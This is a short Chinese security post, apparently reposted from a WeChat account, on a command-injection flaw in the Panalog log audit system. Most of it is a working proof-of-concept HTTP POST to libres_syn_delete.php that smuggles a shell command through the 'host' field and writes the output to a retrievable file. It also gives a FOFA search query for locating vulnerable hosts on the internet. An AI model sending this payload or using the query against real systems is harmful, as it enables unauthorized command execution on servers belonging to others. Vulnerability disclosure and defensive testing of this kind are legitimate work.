漏洞影响范围
Panalog<= MARS r10p1Free
漏洞复现
poc
POST
/content-apply/libres_syn_delete.php
HTTP/1.1
Host
:
User-Agent
: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Content-Length
: 28
Accept
: */*
Accept-Encoding
: gzip, deflate
Connection
: close
Content-Type
: application/x-www-form-urlencoded
token
=
1
&id=
2
&host=|id >
1
.txt
漏洞复现
-
出现以下信息代表漏洞存在
2.访问代码执行结果url+/content-apply/1.txt
搜索语法
fofa:body="js/pad-zeropadding.js" && category="日志分析与审计"
原文始发于微信公众号(小白菜安全):Panalog日志审计系统 libres_syn_delete.php命令执行漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论